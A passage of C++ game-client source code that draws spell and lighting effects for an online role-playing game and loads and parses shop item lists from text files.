			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			m_pEffectSpr[158]->PutTransSprite70(dX, dY , cTempFrame, dwTime);
			m_pEffectSpr[154]->PutTransSprite70(dX, dY , cTempFrame, dwTime);
			break;
		case 245: // Strike-Of-The-Ghosts
		case 198:
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
 
			m_pEffectSpr[158]->PutTransSprite70(dX, dY , cTempFrame, dwTime);
			m_pEffectSpr[154]->PutTransSprite70(dX, dY , cTempFrame, dwTime);

			break;

		case 80:
		case 196: // Earth-Shock-Wave
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[91]->PutSpriteFast(dX, dY, cTempFrame, dwTime); //Nbe d'arguments modifis ds la 351....
			m_pEffectSpr[92]->PutTransSprite(dX, dY, cTempFrame, dwTime);
			break;

		case 81: // Snoopy: Ajout StormBlade
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = m_pEffectList[i]->m_cFrame;
			m_pEffectSpr[100]->PutTransSprite_NoColorKey(dX+70, dY+70, cTempFrame, dwTime);
			break;

		case 82: // Gate (apocalypse)
			cTempFrame = m_pEffectList[i]->m_cFrame;
			m_pEffectSpr[101]->PutTransSprite_NoColorKey(320, 480, cTempFrame, dwTime);
			break;

		case 100: // Magic Missile
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[0]->PutTransSprite_NoColorKey(dX, dY, 0, dwTime);
			break;

		case 101: // Heal
		case 121: // Great-Heal
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			m_pEffectSpr[50]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 102: // Create Food
		case 104: // Create Potion
		case 124: // Protection from N.M
		case 125: // Hold-Person
		case 126: // Possession
		case 127: // Poison
		case 133: // Protect-From-Magic
		case 134: // Detect-Invisibility
		case 135: // Paralyze
		case 136: // Cure
		case 142: // Confuse Language
		case 152: // Polymorph
		case 153: // Mass-Poison
		case 162: // Confusion
		case 171: // Mass-Confusion
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			if (cTempFrame < 5)
				 m_pEffectSpr[4]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			else m_pEffectSpr[4]->PutTransSpriteRGB(dX, dY, m_pEffectList[i]->m_cFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 110: // Energy-Bolt
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[0]->PutTransSprite_NoColorKey(dX, dY, 2 + (rand() % 4), dwTime);
			break;

		case 111: // Staminar Drain
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			m_pEffectSpr[49]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 112: // Recall
		case 131: // Summon-Creature
		case 132: // Invisibility
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			m_pEffectSpr[52]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 113: // Defense Shield
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			if (cTempFrame < 6)
				 m_pEffectSpr[62]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			else m_pEffectSpr[62]->PutTransSpriteRGB(dX, dY, m_pEffectList[i]->m_cFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 120: // Fire Ball
		case 130: // Fire Strike
		case 161: // Mass-Fire-Strike
		case 251: //
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[5]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 122: // Absent v220 et 351
			break;

		case 123: // Staminar-Recovery
		case 128: // Great-Staminar-Recovery
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			m_pEffectSpr[56]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 137: // Lightning Arrow
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			tX  = (m_pEffectList[i]->m_mX2)  - m_sViewPointX;
			tY  = (m_pEffectList[i]->m_mY2)  - m_sViewPointY;
			iErr = 0;
			m_Misc.GetPoint(dX, dY, tX, tY, &rX, &rY, &iErr, 15);
			m_Misc.GetPoint(dX, dY, tX, tY, &rX2, &rY2, &iErr, 30);
			m_Misc.GetPoint(dX, dY, tX, tY, &rX3, &rY3, &iErr, 45);
			m_Misc.GetPoint(dX, dY, tX, tY, &rX4, &rY4, &iErr, 60);
			m_Misc.GetPoint(dX, dY, tX, tY, &rX5, &rY5, &iErr, 75);
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[10]->PutTransSprite25_NoColorKey(rX5, rY5, cTempFrame, dwTime);
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[10]->PutTransSprite25_NoColorKey(rX4, rY4, cTempFrame, dwTime);
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[10]->PutTransSprite50_NoColorKey(rX3, rY3, cTempFrame, dwTime);
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[10]->PutTransSprite50_NoColorKey(rX2, rY2, cTempFrame, dwTime);
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[10]->PutTransSprite70_NoColorKey(rX,  rY, cTempFrame, dwTime);
			cTempFrame = (m_pEffectList[i]->m_cDir-1)*4 + (rand() % 4);
			if (cTempFrame < 0) break;
			m_pEffectSpr[10]->PutTransSprite(dX, dY, cTempFrame, dwTime);
			break;

		case 143: // Lightning
			_DrawThunderEffect(m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY - 800,
				                m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY,
								m_pEffectList[i]->m_rX, m_pEffectList[i]->m_rY, 1);
			_DrawThunderEffect(m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY - 800,
				                m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY,
								m_pEffectList[i]->m_rX+4, m_pEffectList[i]->m_rY+2, 2);
			_DrawThunderEffect(m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY - 800,
				                m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY,
								m_pEffectList[i]->m_rX-2, m_pEffectList[i]->m_rY-2, 2);
			break;

		case 144: // Great-Defense-Shield
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-5);
			if (cTempFrame < 9)
				 m_pEffectSpr[63]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			else m_pEffectSpr[63]->PutTransSpriteRGB(dX, dY, m_pEffectList[i]->m_cFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 151: // Lightning Bolt
			_DrawThunderEffect(m_pEffectList[i]->m_mX - m_sViewPointX, m_pEffectList[i]->m_mY - m_sViewPointY,
				                m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY,
								m_pEffectList[i]->m_rX, m_pEffectList[i]->m_rY, 1);

			_DrawThunderEffect(m_pEffectList[i]->m_mX - m_sViewPointX, m_pEffectList[i]->m_mY - m_sViewPointY,
				                m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY,
								m_pEffectList[i]->m_rX+2, m_pEffectList[i]->m_rY-2, 2);

			_DrawThunderEffect(m_pEffectList[i]->m_mX - m_sViewPointX, m_pEffectList[i]->m_mY - m_sViewPointY,
				                m_pEffectList[i]->m_dX*32 - m_sViewPointX, m_pEffectList[i]->m_dY*32 - m_sViewPointY,
								m_pEffectList[i]->m_rX-2, m_pEffectList[i]->m_rY-2, 2);
			break;

		case 165: // Absolute-Magic-Protect
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY; // 53 = APFM buble
			m_pEffectSpr[53]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 166: // Armor-Break
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[55]->PutRevTransSprite(dX, dY+35, m_pEffectList[i]->m_cFrame, dwTime);
			m_pEffectSpr[54]->PutTransSprite50(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 176: // Cancellation
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[90]->PutTransSprite_NoColorKey(dX+50, dY+85, cTempFrame, dwTime);
			break;

		case 177: // Illusion-Movement
		case 180: // Illusion
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-3);
			if (cTempFrame < 9)	m_pEffectSpr[60]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			else m_pEffectSpr[60]->PutTransSpriteRGB(dX, dY, m_pEffectList[i]->m_cFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 182: //Mass-Magic-Missile
			cTempFrame = m_pEffectList[i]->m_cFrame;
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[98]->PutTransSprite(dX, dY, cTempFrame, dwTime, 0);
		break;

		case 183: // Inhibition-Casting
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-3);
			if (cTempFrame < 9) m_pEffectSpr[94]->PutTransSprite_NoColorKey(dX, dY + 40, m_pEffectList[i]->m_cFrame, dwTime);
			else m_pEffectSpr[94]->PutTransSpriteRGB(dX, dY + 40, m_pEffectList[i]->m_cFrame, iDvalue, iDvalue, iDvalue, dwTime);
			break;

		case 244: // Snoopy: dplac pour nvx sorts: Aura du casteur de Mass MagicMissile
		
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = m_pEffectList[i]->m_mX - m_sViewPointX;
			dY  = m_pEffectList[i]->m_mY - m_sViewPointY;
			m_pEffectSpr[96]->PutTransSprite(dX, dY, m_pEffectList[i]->m_cFrame, dwTime, 0);
			break;

		case 190: // Mass-Illusion
		case 195: // Mass-Illusion-Movement
			cTempFrame = m_pEffectList[i]->m_cFrame;
			if (cTempFrame < 0) break;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			iDvalue = (cTempFrame - 5)*(-3);
			if (cTempFrame < 9) m_pEffectSpr[61]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			else m_pEffectSpr[61]->PutTransSpriteRGB(dX, dY, m_pEffectList[i]->m_cFrame, iDvalue, iDvalue, iDvalue, dwTime); // RGB2
			break;

		case 242:
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[87]->PutTransSprite_NoColorKey(dX+50, dY+57, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 243:
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[88]->PutTransSprite_NoColorKey(dX+65, dY+80, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 194: // Resurrection
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[99]->PutTransSprite(dX, dY, m_pEffectList[i]->m_cFrame, dwTime, 0);
			break;

		case 200: // shotstar fall on ground
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[133]->PutTransSprite_NoColorKey(dX, dY, (rand() %15), dwTime);
			break;

		case 201: // shotstar fall on ground
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[134]->PutTransSprite_NoColorKey(dX, dY, (rand() %15), dwTime);
			break;

		case 202: // shotstar fall on ground
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[135]->PutTransSprite_NoColorKey(dX, dY, (rand() %15), dwTime);
			break;

		case 203: // explosion feu apoc
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[136]->PutTransSprite_NoColorKey(dX, dY, (rand() %18), dwTime);
			break;

		case 204: // Faille oblique
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[137]->PutTransSprite_NoColorKey(dX, dY, (rand() %12), dwTime);
			break;

		case 205: // Faille horizontale
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[138]->PutTransSprite_NoColorKey(dX, dY, (rand() %12), dwTime);
			break;

		case 206: // steams
			dX  = m_pEffectList[i]->m_mX;
			dY  = m_pEffectList[i]->m_mY;
			m_pEffectSpr[139]->PutTransSprite_NoColorKey(dX, dY, (rand() %20), dwTime);
			break;

		case 247: // AFKChecker
            dX = (m_pEffectList[i]->m_mX) - m_sViewPointX;
            dY = (m_pEffectList[i]->m_mY) - m_sViewPointY;
            m_pEffectSpr[85]->PutTransSprite_NoColorKey(dX+50, dY+30, m_pEffectList[i]->m_cFrame, dwTime);
            break;

		case 250: // Gate (round one)
			dX  = m_pEffectList[i]->m_mX - m_sViewPointX;
			dY  = m_pEffectList[i]->m_mY - m_sViewPointY;
			m_pEffectSpr[103]->PutTransSprite_NoColorKey(dX, dY, (rand() %3), dwTime);
			break;

		case 252: // burst (lisgt salmon color)
			dX  = m_pEffectList[i]->m_mX - m_sViewPointX;
			dY  = m_pEffectList[i]->m_mY - m_sViewPointY;
			m_pEffectSpr[104]->PutTransSprite_NoColorKey(dX, dY, (rand() %3), dwTime);
			break;
		}
	}
}

void CGame::bItemDrop_IconPannel(short msX, short msY)
{short sX, sY, sItemIndex;
	sX = m_stDialogBoxInfo[30].sX;	sY = m_stDialogBoxInfo[30].sY;

	sItemIndex = m_stMCursor.sSelectedObjectID;
	if (m_bIsItemDisabled[sItemIndex] == TRUE) return;
	if (m_cCommand < 0) return;
	if ((453 < msX) && (486 > msX) && (440 < msY) && (475 > msY))
	{	
		bItemDrop_Inventory(m_stDialogBoxInfo[2].sX + (rand() % 148), m_stDialogBoxInfo[2].sY + (rand() % 55));
		return;
	}
	if ((425 < msX)	&& (448 > msX) && (440 < msY) && (475 > msY))
	{	
		bItemDrop_Character();
		return;
	}
}



void CGame::DrawEffectLights()
{int i, dX, dY, iDvalue;
 DWORD dwTime = m_dwCurTime;
 char  cTempFrame;
	for (i = 0;	i < DEF_MAXEFFECTS; i++)
	if (m_pEffectList[i] != NULL) {
		switch (m_pEffectList[i]->m_sType) {
		case 1:
			break;

		case 2:
			break;

		case 4:
			break;

		case 5:	// Fire Explosion
			if (m_pEffectList[i]->m_cFrame >= 0)
			{	dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				iDvalue = (m_pEffectList[i]->m_cFrame - 7)*(-1);
				if (m_pEffectList[i]->m_cFrame < 6)
					 m_pEffectSpr[0]->PutTransSprite_NoColorKey(dX, dY+30, 1, dwTime);
				else m_pEffectSpr[0]->PutTransSpriteRGB(dX, dY+30, 1, iDvalue, iDvalue, iDvalue, dwTime);
			}
			break;

		case 6:	 // Energy Bolt
		case 10: // Lightning Arrow
			if (m_pEffectList[i]->m_cFrame >= 0)
			{	dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				iDvalue = (m_pEffectList[i]->m_cFrame - 9)*(-1);
				if (m_pEffectList[i]->m_cFrame < 8)
					 m_pEffectSpr[0]->PutTransSprite_NoColorKey(dX, dY+30, 1, dwTime);
				else m_pEffectSpr[0]->PutTransSpriteRGB(dX, dY+30, 1, iDvalue, iDvalue, iDvalue, dwTime);
			}
			break;
		case 7: // Magic Missile Explosion
			if (m_pEffectList[i]->m_cFrame >= 0)
			{	dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				iDvalue = (m_pEffectList[i]->m_cFrame - 2)*(-1);
				if (m_pEffectList[i]->m_cFrame < 2)
					 m_pEffectSpr[0]->PutTransSprite_NoColorKey(dX, dY+30, 1, dwTime);
				else m_pEffectSpr[0]->PutTransSpriteRGB(dX, dY+30, 1, iDvalue, iDvalue, iDvalue, dwTime);
			}
			break;

		case 16:
		case 61:
		case 66:
		case 100:
		case 110:
		case 120:
		case 130:
		case 137: // Lightning arrow
			// Light on ground below the flying effect
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			iDvalue = -5;
			m_pEffectSpr[0]->PutTransSpriteRGB(dX, dY+30, 1, iDvalue, iDvalue, iDvalue, dwTime);
			break;

		case 69:
		case 70:
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[0]->PutTransSprite25(dX, dY+30, 1, dwTime);
			break;

		case 33: //
			
			break;

		case 40: //
		case 56:
			if (m_pEffectList[i]->m_cFrame >= 0)
			{	dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				iDvalue = (m_pEffectList[i]->m_cFrame - 7)*(-1);
				if (m_pEffectList[i]->m_cFrame < 6)
					 m_pEffectSpr[0]->PutTransSprite(dX, dY, 1, dwTime);
				else m_pEffectSpr[0]->PutTransSpriteRGB(dX, dY, 1, iDvalue, iDvalue, iDvalue, dwTime);
			}
			break;

		case 52: // Protection Ring
			if (m_pEffectList[i]->m_cFrame >= 0)
			{				dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				m_pEffectSpr[24]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			}
			break;

		case 57:
			if (m_pEffectList[i]->m_cFrame >= 0) {
				dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
				dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
				m_pEffectSpr[30]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			}
			break;

		case 73:
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[74]->PutTransSprite(dX, dY-34, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 74:
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[75]->PutTransSprite(dX, dY+35, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 75: // Icegolem
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[76]->PutTransSprite25(dX+m_pEffectList[i]->m_dX*m_pEffectList[i]->m_cFrame, dY+m_pEffectList[i]->m_dY*m_pEffectList[i]->m_cFrame, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 76:// Icegolem
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[77]->PutTransSprite25(dX+m_pEffectList[i]->m_dX*m_pEffectList[i]->m_cFrame, dY+m_pEffectList[i]->m_dY*m_pEffectList[i]->m_cFrame, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 77:// Icegolem
			dX  = (m_pEffectList[i]->m_mX)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_mY)  - m_sViewPointY;
			m_pEffectSpr[78]->PutTransSprite25(dX+m_pEffectList[i]->m_dX*m_pEffectList[i]->m_cFrame, dY+m_pEffectList[i]->m_dY*m_pEffectList[i]->m_cFrame, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 150: // Berserk : Cirlcle 6 magic
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[58]->PutTransSprite_NoColorKey(dX, dY, m_pEffectList[i]->m_cFrame, dwTime);
			break;

		case 180: // Ilusion
		case 190: // Mass Illusion
			cTempFrame = m_pEffectList[i]->m_cFrame;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[59]->PutTransSprite_NoColorKey(dX, dY, cTempFrame, dwTime);
			break;

		case 177: // Illusion mvt
		case 195: // Mass Illusion mvt
			cTempFrame = m_pEffectList[i]->m_cFrame;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[102]->PutTransSprite_NoColorKey(dX, dY+30, cTempFrame, dwTime);
			break;

		case 183: // Inhibition casting
			cTempFrame = m_pEffectList[i]->m_cFrame;
			dX  = (m_pEffectList[i]->m_dX*32)  - m_sViewPointX;
			dY  = (m_pEffectList[i]->m_dY*32)  - m_sViewPointY;
			m_pEffectSpr[95]->PutTransSprite_NoColorKey(dX, dY+40, cTempFrame, dwTime);
			break;

		case 247: // AFKChecker
			if (m_pEffectList[i]->m_cFrame >= m_pEffectList[i]->m_cMaxFrame)
			{	delete m_pEffectList[i];
                m_pEffectList[i] = NULL;
			}else if (m_pEffectList[i]->m_iV1 == m_pEffectList[i]->m_cFrame)
			{    PlaySound('M', 45, m_pEffectList[i]->m_mX3, m_pEffectList[i]->m_mY3 );
			}
            break;
		}
	}
}

void CGame::_LoadShopMenuContents(char cType)
{
 char cFileName[255], cTemp[255];
 HANDLE hFile;
 FILE * pFile;
 DWORD  dwFileSize;
 char * pBuffer;

	ZeroMemory(cTemp, sizeof(cTemp));
	ZeroMemory(cFileName, sizeof(cFileName));
	wsprintf(cTemp, "contents%d", cType);
	strcat(cFileName, "contents" );
	strcat(cFileName, "\\");
	strcat(cFileName, "\\");
	strcat(cFileName, cTemp);
	strcat(cFileName, ".txt");

	hFile = CreateFile(cFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);

	pFile = fopen(cFileName, "rt");
	if (pFile == NULL) return;
	else {
		pBuffer = new char[dwFileSize+1];
		ZeroMemory(pBuffer, dwFileSize+1);
		fread(pBuffer, dwFileSize, 1, pFile);

		__bDecodeContentsAndBuildItemForSaleList(pBuffer);
		delete[] pBuffer;
	}
	fclose(pFile);
}

BOOL CGame::__bDecodeContentsAndBuildItemForSaleList(char * pBuffer)
{
 char * pContents, * token;
 char seps[] = "= ,\t\n";
 char cReadModeA = 0;
 char cReadModeB = 0;
 int  iItemForSaleListIndex = 0;
 class CStrTok * pStrTok;

	pContents = pBuffer;

	pStrTok = new class CStrTok(pContents, seps);
	token = pStrTok->pGet();
	while( token != NULL ) {
		if (cReadModeA != 0) {
			//
			switch (cReadModeA) {
			case 1:
				switch (cReadModeB) {
				case 1:
					ZeroMemory(m_pItemForSaleList[iItemForSaleListIndex]->m_cName, sizeof(m_pItemForSaleList[iItemForSaleListIndex]->m_cName));
					memcpy(m_pItemForSaleList[iItemForSaleListIndex]->m_cName, token, strlen(token));
					cReadModeB = 2;
					break;
				case 2:	// m_cItemType
					m_pItemForSaleList[iItemForSaleListIndex]->m_cItemType = atoi(token);
					cReadModeB = 3;
					break;
				case 3: // m_cEquipPos
					m_pItemForSaleList[iItemForSaleListIndex]->m_cEquipPos = atoi(token);
					cReadModeB = 4;
					break;
				case 4: // m_sItemEffectType
					cReadModeB = 5;
					break;
				case 5:	// m_sItemEffectValue1
					m_pItemForSaleList[iItemForSaleListIndex]->m_sItemEffectValue1 = atoi(token);
					cReadModeB = 6;
					break;
				case 6: // m_sItemEffectValue2
					m_pItemForSaleList[iItemForSaleListIndex]->m_sItemEffectValue2 = atoi(token);
					cReadModeB = 7;
					break;
				case 7: // m_sItemEffectValue3
					m_pItemForSaleList[iItemForSaleListIndex]->m_sItemEffectValue3 = atoi(token);
					cReadModeB = 8;
					break;
				case 8: // m_sItemEffectValue4
					m_pItemForSaleList[iItemForSaleListIndex]->m_sItemEffectValue4 = atoi(token);
					cReadModeB = 9;
					break;
				case 9: // m_sItemEffectValue5
					m_pItemForSaleList[iItemForSaleListIndex]->m_sItemEffectValue5 = atoi(token);
					cReadModeB = 10;
					break;
				case 10: // m_sItemEffectValue6
					m_pItemForSaleList[iItemForSaleListIndex]->m_sItemEffectValue6 = atoi(token);
					cReadModeB = 11;
					break;
				case 11: // m_wMaxLifeSpan
					m_pItemForSaleList[iItemForSaleListIndex]->m_wMaxLifeSpan = (WORD)atoi(token);
					cReadModeB = 12;
					break;
				case 12: // m_sMaxFixCount
					cReadModeB = 13;
					break;
				case 13: // m_sSprite
					m_pItemForSaleList[iItemForSaleListIndex]->m_sSprite = atoi(token);
					cReadModeB = 14;
					break;
				case 14: // m_sSpriteFrame
					m_pItemForSaleList[iItemForSaleListIndex]->m_sSpriteFrame = atoi(token);
					cReadModeB = 15;
